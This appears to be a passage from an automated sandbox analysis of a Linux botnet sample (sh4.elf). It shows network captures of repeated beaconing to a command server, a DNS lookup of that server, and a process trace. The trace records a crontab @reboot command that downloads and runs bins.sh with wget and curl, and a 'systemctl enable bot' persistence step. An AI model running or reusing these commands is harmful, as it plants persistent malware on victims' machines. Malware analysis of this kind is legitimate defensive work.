                                                    LOAD0xf3ac0x41f3ac0x41f3ac0x3b40x66c03.07350x6RW 0x10000.ctors .dtors .jcr .data .got .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2024 01:01:27.320657969 CET43928443192.168.2.2391.189.91.42
                                                    Nov 20, 2024 01:01:32.657644033 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:32.662590027 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:32.662686110 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:32.665358067 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:32.670193911 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:33.145284891 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:33.145370960 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:37.555210114 CET4433925434.249.145.219192.168.2.23
                                                    Nov 20, 2024 01:01:37.555408001 CET39254443192.168.2.2334.249.145.219
                                                    Nov 20, 2024 01:01:37.560251951 CET4433925434.249.145.219192.168.2.23
                                                    Nov 20, 2024 01:01:38.145885944 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:38.145948887 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:38.146104097 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:38.150904894 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:41.654611111 CET4251680192.168.2.23109.202.202.202
                                                    Nov 20, 2024 01:01:43.146884918 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:43.146979094 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:43.147109985 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:43.151881933 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:43.151935101 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:43.156764030 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:47.797693968 CET43928443192.168.2.2391.189.91.42
                                                    Nov 20, 2024 01:01:48.215354919 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:48.215425968 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:48.215468884 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:48.220393896 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:48.220455885 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:48.225374937 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:53.217497110 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:53.217618942 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:53.222609997 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:53.222664118 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:53.227571964 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:58.148996115 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:58.149152040 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:58.154041052 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:01:58.154094934 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:01:58.159040928 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:03.150079012 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:03.150213957 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:03.155220985 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:03.155296087 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:03.160243034 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:08.150274992 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:08.150433064 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:08.155344963 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:08.155427933 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:08.160342932 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:13.150444984 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:13.150589943 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:13.155538082 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:13.155610085 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:13.160502911 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:18.151145935 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:18.151376963 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:18.156415939 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:18.156588078 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:18.161510944 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:23.152077913 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:23.152282953 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:23.157345057 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:23.157437086 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:23.162283897 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:28.153321028 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:28.153609037 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:28.158545017 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:28.158637047 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:28.163484097 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:28.752159119 CET43928443192.168.2.2391.189.91.42
                                                    Nov 20, 2024 01:02:33.154023886 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:33.154237986 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:33.159219027 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:33.159277916 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:33.164200068 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:38.259569883 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:38.259784937 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:38.264830112 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:38.265007973 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:38.270004034 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:43.156738043 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:43.156928062 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:43.162266970 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:43.162354946 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:43.167226076 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:48.156054020 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:48.156289101 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:48.161135912 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:48.161214113 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:48.166038036 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:53.157166004 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:53.157548904 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:53.162662029 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:53.162755966 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:53.167633057 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:58.160672903 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:58.161062002 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:58.166008949 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:02:58.166094065 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:02:58.170969963 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:03.158404112 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:03.158771038 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:03.163728952 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:03.163814068 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:03.168661118 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:08.159226894 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:08.159512997 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:08.164479017 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:08.164546967 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:08.169469118 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:13.160242081 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:13.160397053 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:13.165301085 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:13.165406942 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:13.170224905 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:18.181551933 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:18.181797028 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:18.186763048 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:18.186861038 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:18.191781998 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:23.161518097 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:23.161756992 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:23.166596889 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:23.166702032 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:23.171529055 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:28.162317991 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:28.162523985 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:28.167479992 CET129059274172.111.38.48192.168.2.23
                                                    Nov 20, 2024 01:03:28.167586088 CET592741290192.168.2.23172.111.38.48
                                                    Nov 20, 2024 01:03:28.172466040 CET129059274172.111.38.48192.168.2.23
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2024 01:01:32.490186930 CET4182253192.168.2.231.1.1.1
                                                    Nov 20, 2024 01:01:32.654469967 CET53418221.1.1.1192.168.2.23
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 20, 2024 01:01:32.490186930 CET192.168.2.231.1.1.10xe89eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 20, 2024 01:01:32.654469967 CET1.1.1.1192.168.2.230xe89eNo error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false

                                                    System Behavior

                                                    Start time (UTC):00:01:27
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:/tmp/sh4.elf
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:27
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:27
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -l
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/chmod
                                                    Arguments:chmod +x bins.sh
                                                    File size:63864 bytes
                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/sh
                                                    Arguments:sh bins.sh
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/curl
                                                    Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
                                                    File size:239848 bytes
                                                    MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/chmod
                                                    Arguments:chmod +x bins.sh
                                                    File size:63864 bytes
                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/sh
                                                    Arguments:sh bins.sh
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:32
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/tmp/sh4.elf
                                                    Arguments:-
                                                    File size:4139976 bytes
                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:sh -c "/bin/systemctl enable bot"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/bin/systemctl
                                                    Arguments:/bin/systemctl enable bot
                                                    File size:996584 bytes
                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):00:01:34
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                    File size:22760 bytes
                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                    Start time (UTC):00:01:37
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:37
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):00:01:37
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):00:01:37
                                                    Start date (UTC):20/11/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b